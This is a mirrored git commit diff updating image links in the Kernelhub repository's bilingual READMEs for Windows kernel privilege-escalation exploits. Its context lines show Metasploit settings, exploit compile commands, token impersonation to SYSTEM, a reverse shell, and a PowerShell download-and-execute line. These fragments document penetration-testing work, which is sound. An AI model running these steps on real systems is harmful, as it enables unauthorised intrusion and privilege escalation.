mirror of
https://mirror.skon.top/github.com/Ascotbe/Kernelhub
synced 2026-04-22 05:40:26 +08:00
Update image source🍈
This commit is contained in:
ascotbe
@@ -34,9 +34,9 @@ set RHOST 192.168.1.17
|
||||
run
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
查看系统信息
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
@@ -34,9 +34,9 @@ set RHOST 192.168.1.17
|
||||
run
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
View system information
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
@@ -22,7 +22,7 @@
|
||||
|
||||
测试系统Windows Server 2003 SP2 x86
|
||||
|
||||
|
||||
|
||||
|
||||
#### 分析文章
|
||||
- https://github.com/lyshark/Windows-exploits/blob/master/Windows%20%E5%86%85%E6%A0%B8%E6%BC%8F%E6%B4%9E%20ms08025%20%E5%88%86%E6%9E%90.7z
|
||||
|
||||
@@ -22,7 +22,7 @@ Unspecified vulnerability in the kernel in Microsoft Windows 2000 SP4, XP SP2, S
|
||||
|
||||
Test system Windows Server 2003 SP2 x86
|
||||
|
||||
|
||||
|
||||
|
||||
#### Analyze
|
||||
- https://github.com/lyshark/Windows-exploits/blob/master/Windows%20%E5%86%85%E6%A0%B8%E6%BC%8F%E6%B4%9E%20ms08025%20%E5%88%86%E6%9E%90.7z
|
||||
|
||||
@@ -20,7 +20,7 @@
|
||||
|
||||
只找到可执行exe文件,测试系统Windows Server 2003 SP2 x86
|
||||
|
||||
|
||||
|
||||
|
||||
#### 分析文章
|
||||
- https://bbs.pediy.com/thread-74811.htm
|
||||
@@ -21,7 +21,7 @@ afd.sys in the Ancillary Function Driver (AFD) component in Microsoft Windows XP
|
||||
|
||||
Only find Exe files, test systems Windows Server 2003 SP2 x86
|
||||
|
||||
|
||||
|
||||
|
||||
#### Analyze
|
||||
- https://bbs.pediy.com/thread-74811.htm
|
||||
@@ -27,5 +27,5 @@ set SMBHOST 192.168.1.14 #目标IP
|
||||
run
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
@@ -28,5 +28,5 @@ set SMBHOST 192.168.1.14 #目标IP
|
||||
run
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
@@ -29,7 +29,7 @@ set RHOST 192.168.1.14
|
||||
run
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
#### 分析文章
|
||||
- https://bbs.pediy.com/thread-251219.htm
|
||||
|
||||
@@ -30,7 +30,7 @@ set RHOST 192.168.1.14
|
||||
run
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
#### Analyze
|
||||
- https://bbs.pediy.com/thread-251219.htm
|
||||
|
||||
@@ -24,7 +24,7 @@ set RHOSTS 192.168.1.13 #目标IP
|
||||
run
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
#### 分析文章
|
||||
- https://www.giantbranch.cn/2017/08/26/Educatedscholar%E5%88%A9%E7%94%A8%E7%9A%84%E6%BC%8F%E6%B4%9Ems09-050%E5%88%86%E6%9E%90%E5%8F%8A%E5%85%B6%E5%88%A9%E7%94%A8%E7%9A%84shellcode%E5%88%86%E6%9E%90%E5%8F%8A%E4%B8%8Emsf%E5%88%A9%E7%94%A8%E5%AF%B9%E6%AF%94/
|
||||
|
||||
@@ -25,7 +25,7 @@ set RHOSTS 192.168.1.13 #目标IP
|
||||
run
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
#### Analyze
|
||||
- https://www.giantbranch.cn/2017/08/26/Educatedscholar%E5%88%A9%E7%94%A8%E7%9A%84%E6%BC%8F%E6%B4%9Ems09-050%E5%88%86%E6%9E%90%E5%8F%8A%E5%85%B6%E5%88%A9%E7%94%A8%E7%9A%84shellcode%E5%88%86%E6%9E%90%E5%8F%8A%E4%B8%8Emsf%E5%88%A9%E7%94%A8%E5%AF%B9%E6%AF%94/
|
||||
|
||||
@@ -26,7 +26,7 @@
|
||||
|
||||
测试系统Windows Server 2003 SP2 x86
|
||||
|
||||
|
||||
|
||||
|
||||
> msf利用
|
||||
|
||||
@@ -40,8 +40,8 @@ run
|
||||
|
||||
可以看到当前权限是最低的
|
||||
|
||||
|
||||
|
||||
|
||||
然后执行命令提权
|
||||
|
||||
|
||||
|
||||
@@ -27,7 +27,7 @@ CompilerEnvironment
|
||||
|
||||
Test system Windows Server 2003 SP2 x86
|
||||
|
||||
|
||||
|
||||
|
||||
> MSF utilization
|
||||
|
||||
@@ -41,8 +41,8 @@ run
|
||||
|
||||
You can see that the current permissions are the lowest.
|
||||
|
||||
|
||||
|
||||
|
||||
Then execute command rights
|
||||
|
||||
|
||||
|
||||
@@ -22,5 +22,5 @@ win32k.sys中的Windows内核模式驱动程序无法正确验证伪句柄值
|
||||
|
||||
测试系统Windows Server 2003 SP2 x86
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
@@ -23,5 +23,5 @@ The Windows kernel-mode drivers in win32k.sys in Microsoft Windows XP SP2 and SP
|
||||
|
||||
Test system Windows Server 2003 SP2 x86
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
@@ -25,9 +25,9 @@ set SESSION 2
|
||||
run
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
然后就能提权成功了
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
@@ -25,9 +25,9 @@ set SESSION 2
|
||||
run
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
Then it will be successful.
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
@@ -29,7 +29,7 @@ i686-w64-mingw32-gcc CVE-2011-1249.c -o CVE-2011-1249.exe -lws2_32
|
||||
|
||||
测试系统Windows Server 2003 SP2 x86和Windows 7 SP1 x86都成功
|
||||
|
||||
|
||||
|
||||
|
||||
#### 分析文章
|
||||
- https://github.com/Madusanka99/OHTS/blob/master/IT16075504%20-OHTS%20Report.pdf
|
||||
@@ -29,7 +29,7 @@ i686-w64-mingw32-gcc CVE-2011-1249.c -o CVE-2011-1249.exe -lws2_32
|
||||
|
||||
Test system Windows Server 2003 SP2 x86 and Windows 7 SP1 x86 Can use
|
||||
|
||||
|
||||
|
||||
|
||||
#### Analyze
|
||||
- https://github.com/Madusanka99/OHTS/blob/master/IT16075504%20-OHTS%20Report.pdf
|
||||
@@ -22,9 +22,9 @@ i686-w64-mingw32-gcc CVE-2011-1974.c -o CVE-2011-1974.exe -lws2_32
|
||||
|
||||
测试系统Windows Server 2003 SP2 x86,首先需要用管理员修改注册表和开启服务
|
||||
|
||||
|
||||
|
||||
|
||||
接着切回普通用户
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
@@ -23,9 +23,9 @@ i686-w64-mingw32-gcc CVE-2011-1974.c -o CVE-2011-1974.exe -lws2_32
|
||||
|
||||
Test system Windows Server 2003 SP2 x86,First, you need to modify the registry and open service with an administrator.
|
||||
|
||||
|
||||
|
||||
|
||||
Then cut back to ordinary users
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
@@ -16,7 +16,7 @@
|
||||
|
||||
测试系统Windows Server 2003 SP2 x86
|
||||
|
||||
|
||||
|
||||
|
||||
msf利用直接使用这个即可
|
||||
|
||||
|
||||
@@ -16,7 +16,7 @@ afd.sys in the Ancillary Function Driver in Microsoft Windows XP SP2 and SP3 and
|
||||
|
||||
Test system Windows Server 2003 SP2 x86
|
||||
|
||||
|
||||
|
||||
|
||||
MSF uses it directly to use this
|
||||
|
||||
|
||||
@@ -23,5 +23,5 @@
|
||||
|
||||
测试系统Windows Server 2008 R2 SP1 x64
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
@@ -24,5 +24,5 @@ CompilerEnvironment
|
||||
|
||||
Test system Windows Server 2008 R2 SP1 x64
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
@@ -27,7 +27,7 @@
|
||||
|
||||
测试系统Windows Server 2003 SP2 x86
|
||||
|
||||
|
||||
|
||||
|
||||
#### 分析文章
|
||||
- https://www.anquanke.com/vul/id/1045064
|
||||
|
||||
@@ -27,7 +27,7 @@ CompilerEnvironment
|
||||
|
||||
Test system Windows Server 2003 SP2 x86
|
||||
|
||||
|
||||
|
||||
|
||||
#### Analyze
|
||||
- https://www.anquanke.com/vul/id/1045064
|
||||
|
||||
@@ -31,15 +31,15 @@ set SESSION 2 #你上线机器的session
|
||||
run
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
Windows Sever 2003 SP2 x86 和Windows Sever 2003 R2 SP2 x86都测试成功,但是利用文件没有源码只有exe可执行文件
|
||||
|
||||
Windows Sever 2003 SP2 x86 动图如下
|
||||
|
||||
|
||||
|
||||
|
||||
Windows Sever 2003 R2 SP2 x86 动图如下
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
@@ -31,15 +31,15 @@ set SESSION 2 #你上线机器的session
|
||||
run
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
Windows Server 2003 SP2 X86 and Windows Server 2003 R2 SP2 X86 are successful, but the file does not have the source code only exe executable
|
||||
|
||||
Windows Sever 2003 SP2 x86 GIF
|
||||
|
||||
|
||||
|
||||
|
||||
Windows Sever 2003 R2 SP2 x86 GIF
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
@@ -27,13 +27,13 @@
|
||||
|
||||
测试系统Windows 7 SP1 x86 ,测试exe文件和py脚本都可以正常利用
|
||||
|
||||
|
||||
|
||||
|
||||
> x64利用
|
||||
|
||||
测试系统Windows 7 SP1 x64 测试利用py脚本,exe文件有机率蓝屏
|
||||
|
||||
|
||||
|
||||
|
||||
#### 分析文章
|
||||
- https://xz.aliyun.com/t/6770
|
||||
|
||||
@@ -28,13 +28,13 @@ With the script is Python, there is also a compiled EXE version
|
||||
|
||||
Test system Windows 7 SP1 x86 ,Test EXE files and py scripts can be used normally
|
||||
|
||||
|
||||
|
||||
|
||||
> x64 utilization
|
||||
|
||||
Test system Windows 7 SP1 x64 Use the PY script, EXE file organically blue screen
|
||||
|
||||
|
||||
|
||||
|
||||
#### Analyze
|
||||
- https://xz.aliyun.com/t/6770
|
||||
|
||||
@@ -20,7 +20,7 @@ i586-mingw32msvc-gcc CVE-2014-4076.c -o CVE-2014-4076.exe
|
||||
|
||||
测试机器Windows Server 2003 SP2 x86
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
#### 分析文章
|
||||
|
||||
@@ -21,7 +21,7 @@ i586-mingw32msvc-gcc CVE-2014-4076.c -o CVE-2014-4076.exe
|
||||
|
||||
Test Machine Windows Server 2003 SP2 x86
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
#### Analyze
|
||||
|
||||
@@ -32,13 +32,13 @@
|
||||
|
||||
测试系统Windows 7 SP1 x86
|
||||
|
||||
|
||||
|
||||
|
||||
> x64利用
|
||||
|
||||
测试系统Windows 7 SP1 x64
|
||||
|
||||
|
||||
|
||||
|
||||
#### 分析文章
|
||||
- https://xz.aliyun.com/t/4456
|
||||
|
||||
@@ -33,13 +33,13 @@ CompilerEnvironment
|
||||
|
||||
Test system Windows 7 SP1 x86
|
||||
|
||||
|
||||
|
||||
|
||||
> x64 utilization
|
||||
|
||||
Test system Windows 7 SP1 x64
|
||||
|
||||
|
||||
|
||||
|
||||
#### Analyze
|
||||
- https://xz.aliyun.com/t/4456
|
||||
|
||||
@@ -30,7 +30,7 @@
|
||||
|
||||
利用Windows 7 SP1 x86作为演示
|
||||
|
||||
|
||||
|
||||
|
||||
> x64利用
|
||||
|
||||
@@ -40,7 +40,7 @@
|
||||
|
||||
利用Windows Server 2008 R2 SP1 x64进行测试
|
||||
|
||||
|
||||
|
||||
|
||||
#### 分析文章
|
||||
- https://www.shuzhiduo.com/A/Vx5M1WrL5N/
|
||||
|
||||
@@ -30,7 +30,7 @@ CompilerEnvironment
|
||||
|
||||
Use Windows 7 SP1 X86 as a demonstration
|
||||
|
||||
|
||||
|
||||
|
||||
> X64 utilization
|
||||
|
||||
@@ -40,7 +40,7 @@ CompilerEnvironment
|
||||
|
||||
Testing with Windows Server 2008 R2 SP1 X64
|
||||
|
||||
|
||||
|
||||
|
||||
#### Analyze
|
||||
- https://www.shuzhiduo.com/A/Vx5M1WrL5N/
|
||||
|
||||
@@ -31,7 +31,7 @@
|
||||
|
||||
对Windows 7 SP1 x86进行测试
|
||||
|
||||
|
||||
|
||||
|
||||
#### 分析文章
|
||||
- https://xz.aliyun.com/t/4549
|
||||
|
||||
@@ -32,7 +32,7 @@ The test uses the compiled EXP `CVE-2015-0057_x86` and `CVE-2015-0057_x64` found
|
||||
|
||||
Test Windows 7 SP1 X86
|
||||
|
||||
|
||||
|
||||
|
||||
#### Analyze
|
||||
- https://xz.aliyun.com/t/4549
|
||||
|
||||
@@ -24,10 +24,10 @@
|
||||
|
||||
测试机器 Windows 7 SP1 x86
|
||||
|
||||
|
||||
|
||||
|
||||
> x64利用
|
||||
|
||||
测试使用Windows Server 2008 R2 SP1 x64
|
||||
|
||||
|
||||
|
||||
@@ -24,10 +24,10 @@ CompilerEnvironment
|
||||
|
||||
Test Machine Windows 7 SP1 x86
|
||||
|
||||
|
||||
|
||||
|
||||
> x64 utilization
|
||||
|
||||
Test Machine Windows Server 2008 R2 SP1 x64
|
||||
|
||||
|
||||
|
||||
@@ -36,7 +36,7 @@ Trebuchet.exe c:\Users\ascotbe\Desktop\test.txt c:\Windows\System32\test1.txt
|
||||
|
||||
演示机器Windows 7 SP1 x86
|
||||
|
||||
|
||||
|
||||
|
||||
#### 分析文章
|
||||
- http://bobao.360.cn/learning/detail/584.html
|
||||
|
||||
@@ -36,7 +36,7 @@ Trebuchet.exe c:\Users\ascotbe\Desktop\test.txt c:\Windows\System32\test1.txt
|
||||
|
||||
Demonstrate Machine Windows 7 SP1 x86
|
||||
|
||||
|
||||
|
||||
|
||||
#### Analyze
|
||||
- http://bobao.360.cn/learning/detail/584.html
|
||||
|
||||
@@ -31,5 +31,5 @@ Adobe Type Manager字体驱动程序中的ATMFD.DLL允许本地用户通过精
|
||||
|
||||
演示系统Windows Server 2003 SP2 x86
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
@@ -32,5 +32,5 @@ Currently compiled only the `CVE-2015-2387_X86` project,`CVE-2015-2387_X64` pr
|
||||
|
||||
Demo System Windows Server 2003 SP2 x86
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
@@ -28,7 +28,7 @@
|
||||
|
||||
测试机器Windows 7 SP1 x86,当前只有x86版本的EXP,测试GIF图
|
||||
|
||||
|
||||
|
||||
|
||||
#### 分析文章
|
||||
- http://drops.xmd5.com/static/drops/papers-9276.html
|
||||
|
||||
@@ -29,7 +29,7 @@ CompilerEnvironment
|
||||
|
||||
Test Machine Windows 7 SP1 X86, current only X86 version of Exp, test GIF map
|
||||
|
||||
|
||||
|
||||
|
||||
#### Analyze
|
||||
- http://drops.xmd5.com/static/drops/papers-9276.html
|
||||
|
||||
@@ -35,7 +35,7 @@ run
|
||||
|
||||
可以看到如下的反弹shell
|
||||
|
||||
|
||||
|
||||
|
||||
接着使用提权漏洞
|
||||
|
||||
@@ -45,6 +45,6 @@ set session 2#你当前的session
|
||||
run
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
可以看到我们最后成为了SYSTEM权限
|
||||
@@ -36,7 +36,7 @@ run
|
||||
|
||||
You can see the following rebound shell
|
||||
|
||||
|
||||
|
||||
|
||||
Then use the rights vulnerability
|
||||
|
||||
@@ -46,6 +46,6 @@ set session 2#你当前的session
|
||||
run
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
You can see that we finally became SYSTEM permissions.
|
||||
@@ -27,5 +27,5 @@
|
||||
|
||||
测试机器Windows 7 SP1 x86。需要把**CVE-2016-0051_x86.zip**解压后的两个文件放到目标中
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
@@ -27,5 +27,5 @@ CompilerEnvironment
|
||||
|
||||
Test Machine Windows 7 SP1 x86. Need to decompress the two files after the **CVE-2016-0051_X86.zip** is placed in the target
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
@@ -25,7 +25,7 @@
|
||||
|
||||
测试Windows 7 SP1 x64的GIF图
|
||||
|
||||
|
||||
|
||||
|
||||
#### 分析文章
|
||||
- https://xz.aliyun.com/t/6008
|
||||
|
||||
@@ -25,7 +25,7 @@ The X64 version in the project is perfect for Windows 7 SP1 X64 and Windows Serv
|
||||
|
||||
Test the GIF map of Windows 7 SP1 X64
|
||||
|
||||
|
||||
|
||||
|
||||
#### Analyze
|
||||
- https://xz.aliyun.com/t/6008
|
||||
|
||||
@@ -38,9 +38,9 @@ powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('
|
||||
|
||||
GIF图如下
|
||||
|
||||
|
||||
|
||||
|
||||
利用exe文件测试通杀x64和x86的所有版本,这边只录制Windows 7 SP1 x64版本的
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
@@ -38,9 +38,9 @@ powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('
|
||||
|
||||
GIF map is as follows
|
||||
|
||||
|
||||
|
||||
|
||||
Test all the versions of X64 and X86 using the EXE file, which only records Windows 7 SP1 X64 version
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
@@ -31,7 +31,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-3225
|
||||
|
||||
Windows 7 SP1 x64测试中,使用`whoami /priv`命令查看发现并无**SeImpersonatePrivilege**特权烂土豆提权需要该特权为开启状态,所以测试的时候直接用管理员权限运行
|
||||
|
||||
|
||||
|
||||
|
||||
利用MSF+烂土豆提权,首先我们假定机器已经上线,通过msf中自带的插件来识别当前系统中可以利用的EXP来进行提权
|
||||
|
||||
@@ -43,11 +43,11 @@ run
|
||||
|
||||
如果没有用管理员权限运行MSF生成的exe的话,脚本检测是这样的
|
||||
|
||||
|
||||
|
||||
|
||||
如果使用管理员权限运行的话检测是这样的,可以看到比上面多了个ms16_075
|
||||
|
||||
|
||||
|
||||
|
||||
编译好烂土豆的文件
|
||||
|
||||
@@ -71,11 +71,11 @@ list_tokens -u #列出目标主机用户的可用令牌
|
||||
impersonate_token "NT AUTHORITY\SYSTEM"#假冒目标主机上的可用令牌
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
进入shell查看
|
||||
|
||||
|
||||
|
||||
|
||||
> 第二种利用方式
|
||||
|
||||
@@ -85,5 +85,5 @@ impersonate_token "NT AUTHORITY\SYSTEM"#假冒目标主机上的可用令牌
|
||||
|
||||
由于普通账号没有**SeImpersonatePrivilege**特权,这边用管理员账号来演示,利用程序**potatoNG.exe**直接上GIF图
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
@@ -32,7 +32,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-3225
|
||||
|
||||
Windows 7 SP1 x64测试中,use `whoami /priv` Command View Discovery None **SeiMpersonateprivilege** Privilege Potato Right requires this privilege to turn on, so use administrator privileges when testing
|
||||
|
||||
|
||||
|
||||
|
||||
Use MSF + rotten potatoes,First we assume that the machine has been launched, through the plugins from the MSF to identify the EXP you can take advantage of the current system to carry out rights
|
||||
|
||||
@@ -44,11 +44,11 @@ run
|
||||
|
||||
If you do not run the MSF generated EXE, the script test is like this.
|
||||
|
||||
|
||||
|
||||
|
||||
If you use the administrator privilege to run, you can see more than the above MS16_075.
|
||||
|
||||
|
||||
|
||||
|
||||
Compiling the files of bad potatoes
|
||||
|
||||
@@ -72,11 +72,11 @@ list_tokens -u #列出目标主机用户的可用令牌
|
||||
impersonate_token "NT AUTHORITY\SYSTEM"#假冒目标主机上的可用令牌
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
Enter the Shell View
|
||||
|
||||
|
||||
|
||||
|
||||
> Second utilization
|
||||
|
||||
@@ -86,5 +86,5 @@ CompilerEnvironment
|
||||
|
||||
Since there is no **Seimpersonateprivilege** privilege, this is demonstrated by the administrator account, using the program **potatoNG.exe** directly GIF map
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
@@ -30,7 +30,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-3371
|
||||
|
||||
测试系统Windows 8.1 x64
|
||||
|
||||
|
||||
|
||||
|
||||
#### 项目来源
|
||||
|
||||
|
||||
@@ -31,7 +31,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-3371
|
||||
|
||||
Test system Windows 8.1 x64
|
||||
|
||||
|
||||
|
||||
|
||||
#### ProjectSource
|
||||
|
||||
|
||||
@@ -37,7 +37,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-7255
|
||||
|
||||
通过ps脚本进行演示,直接上GIF图
|
||||
|
||||
|
||||
|
||||
|
||||
#### 分析文章
|
||||
- https://www.anquanke.com/post/id/85232
|
||||
@@ -37,7 +37,7 @@ This vulnerability kills all affected system X64 versions, three Exp can be used
|
||||
|
||||
Demo through the PS script, directly on the GIF map
|
||||
|
||||
|
||||
|
||||
|
||||
#### Analyze
|
||||
- https://www.anquanke.com/post/id/85232
|
||||
@@ -26,7 +26,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0101
|
||||
|
||||
测试Windows 7 SP1 x86通过,直接上GIF图
|
||||
|
||||
|
||||
|
||||
|
||||
#### 分析文章
|
||||
- https://paper.seebug.org/586/
|
||||
|
||||
@@ -27,7 +27,7 @@ CompilerEnvironment
|
||||
|
||||
Test Windows 7 SP1 X86 pass, directly on GIF map
|
||||
|
||||
|
||||
|
||||
|
||||
#### Analyze
|
||||
- https://paper.seebug.org/586/
|
||||
|
||||
@@ -37,11 +37,11 @@ set RHOSTS 192.168.0.128
|
||||
run
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
并且权限是system的
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
#### 分析文章
|
||||
|
||||
@@ -38,11 +38,11 @@ set RHOSTS 192.168.0.128
|
||||
run
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
And the permissions are SYSTEM
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
#### Analyze
|
||||
|
||||
@@ -36,7 +36,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0213
|
||||
|
||||
测试环境Windows 7 SP1 x64
|
||||
|
||||
|
||||
|
||||
|
||||
#### 分析文章
|
||||
- https://cloud.tencent.com/developer/article/1045805
|
||||
@@ -36,7 +36,7 @@ CompilerEnvironment
|
||||
|
||||
Test environment Windows 7 SP1 x64
|
||||
|
||||
|
||||
|
||||
|
||||
#### Analyze
|
||||
- https://cloud.tencent.com/developer/article/1045805
|
||||
@@ -41,7 +41,7 @@ run
|
||||
|
||||
生成文件
|
||||
|
||||
|
||||
|
||||
|
||||
运行命令把它拷贝到test目录下
|
||||
|
||||
@@ -49,7 +49,7 @@ run
|
||||
cp -r /root/.msf4/local/ /root/test
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
接着把这些文件全部拷贝到U盘中,然后插上电脑即可
|
||||
|
||||
@@ -61,7 +61,7 @@ https://github.com/Ascotbe/WinKernelhub/tree/master/Patch
|
||||
|
||||
GIF图如下
|
||||
|
||||
|
||||
|
||||
|
||||
#### 分析文章
|
||||
- https://my.oschina.net/u/4310658/blog/3695267
|
||||
|
||||
@@ -42,7 +42,7 @@ run
|
||||
|
||||
Generate files
|
||||
|
||||
|
||||
|
||||
|
||||
Run the command to copy it into the test directory
|
||||
|
||||
@@ -50,7 +50,7 @@ Run the command to copy it into the test directory
|
||||
cp -r /root/.msf4/local/ /root/test
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
Then copy all of these files to the U disk, then plug in the computer.
|
||||
|
||||
@@ -62,7 +62,7 @@ https://github.com/Ascotbe/WinKernelhub/tree/master/Patch
|
||||
|
||||
GIF map is as follows
|
||||
|
||||
|
||||
|
||||
|
||||
#### Analyze
|
||||
- https://my.oschina.net/u/4310658/blog/3695267
|
||||
|
||||
@@ -26,7 +26,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0833
|
||||
|
||||
效果图如下
|
||||
|
||||
|
||||
|
||||
|
||||
#### 分析文章
|
||||
- https://de4dcr0w.github.io/cve%E6%BC%8F%E6%B4%9E/SMBv3%E6%97%A0%E6%95%88%E6%8C%87%E9%92%88%E5%BC%95%E7%94%A8%E6%BC%8F%E6%B4%9E(CVE-2018-0833).html
|
||||
|
||||
@@ -27,7 +27,7 @@ First, use a machine (test Used Kali) to run the Python script in the project, t
|
||||
|
||||
The effect picture is as follows
|
||||
|
||||
|
||||
|
||||
|
||||
#### Analyze
|
||||
- https://de4dcr0w.github.io/cve%E6%BC%8F%E6%B4%9E/SMBv3%E6%97%A0%E6%95%88%E6%8C%87%E9%92%88%E5%BC%95%E7%94%A8%E6%BC%8F%E6%B4%9E(CVE-2018-0833).html
|
||||
|
||||
@@ -27,7 +27,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8120
|
||||
|
||||
当前测试系统Windows 7 SP1 x64
|
||||
|
||||
|
||||
|
||||
|
||||
#### 分析文章
|
||||
- https://github.com/EVOL4/CVE-2018-8120/blob/master/CVE-2018-8120.md
|
||||
|
||||
@@ -27,7 +27,7 @@ CompilerEnvironment
|
||||
|
||||
Test system Windows 7 SP1 x64
|
||||
|
||||
|
||||
|
||||
|
||||
#### Analyze
|
||||
- https://github.com/EVOL4/CVE-2018-8120/blob/master/CVE-2018-8120.md
|
||||
|
||||
@@ -40,7 +40,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8453
|
||||
|
||||
测试系统Windows 10 1709 x64
|
||||
|
||||
|
||||
|
||||
|
||||
#### 分析文章
|
||||
- https://github.com/thepwnrip/leHACK-Analysis-of-CVE-2018-8453
|
||||
|
||||
@@ -40,7 +40,7 @@ CompilerEnvironment
|
||||
|
||||
Test system Windows 10 1709 x64
|
||||
|
||||
|
||||
|
||||
|
||||
#### Analyze
|
||||
- https://github.com/thepwnrip/leHACK-Analysis-of-CVE-2018-8453
|
||||
|
||||
@@ -40,7 +40,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8639
|
||||
|
||||
在Windows 2008 R2 SP1 X64上测试通过的EXP,直接上GIF图
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
@@ -54,7 +54,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8639
|
||||
|
||||
Windows 7 SP1 X64测试通过的EXP,上GIF图
|
||||
|
||||
|
||||
|
||||
|
||||
#### 分析文章
|
||||
- https://www.anquanke.com/post/id/183358
|
||||
|
||||
@@ -40,7 +40,7 @@ CompilerEnvironment
|
||||
|
||||
Windows 2008 R2 SP1 X64 test passed EXP, directly on GIF map
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
@@ -54,7 +54,7 @@ CompilerEnvironment
|
||||
|
||||
Windows 7 SP1 X64 test via EXP, on GIF map
|
||||
|
||||
|
||||
|
||||
|
||||
#### Analyze
|
||||
- https://www.anquanke.com/post/id/183358
|
||||
|
||||
@@ -38,7 +38,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0623
|
||||
|
||||
改POC只对x86的机器有效,测试机器为Windows 7 SP1 x86
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
@@ -39,7 +39,7 @@ CompilerEnvironment
|
||||
|
||||
POC is only valid for the X86 machine, the test machine is Windows 7 SP1 X86
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
@@ -40,7 +40,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0803
|
||||
|
||||
这里测试机器是Windows Server 2008 R2 x64,上GIF图
|
||||
|
||||
|
||||
|
||||
|
||||
#### 分析文章
|
||||
- https://bbs.pediy.com/thread-260289.htm
|
||||
|
||||
@@ -40,7 +40,7 @@ CompilerEnvironment
|
||||
|
||||
Here the test machine is Windows Server 2008 R2 X64, on the GIF map
|
||||
|
||||
|
||||
|
||||
|
||||
#### Analyze
|
||||
- https://bbs.pediy.com/thread-260289.htm
|
||||
|
||||
@@ -25,7 +25,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0808
|
||||
- 编译有点问题
|
||||
|
||||
测试机器为Windows 7 SP1 x86
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
@@ -26,7 +26,7 @@ CompilerEnvironment
|
||||
|
||||
Test machine for Windows 7 SP1 X86
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
@@ -42,7 +42,7 @@ https://github.com/Ascotbe/WindowsKernelExploits/blob/master/CVE-2019-1388/HHUPD
|
||||
|
||||
测试系统Windows 7 SP1 x64
|
||||
|
||||
|
||||
|
||||
|
||||
#### 分析文章
|
||||
- http://blog.leanote.com/post/snowming/38069f423c76
|
||||
|
||||
@@ -42,7 +42,7 @@ https://github.com/Ascotbe/WindowsKernelExploits/blob/master/CVE-2019-1388/HHUPD
|
||||
|
||||
Test system Windows 7 SP1 x64
|
||||
|
||||
|
||||
|
||||
|
||||
#### Analyze
|
||||
- http://blog.leanote.com/post/snowming/38069f423c76
|
||||
|
||||
@@ -39,7 +39,7 @@ cve-2019-1458.exe
|
||||
|
||||
测试系统Windows 7 SP1 x64 ,直接上GIF图
|
||||
|
||||
|
||||
|
||||
|
||||
#### 分析文章
|
||||
- https://github.com/piotrflorczyk/cve-2019-1458_POC
|
||||
|
||||
@@ -40,7 +40,7 @@ cve-2019-1458.exe
|
||||
|
||||
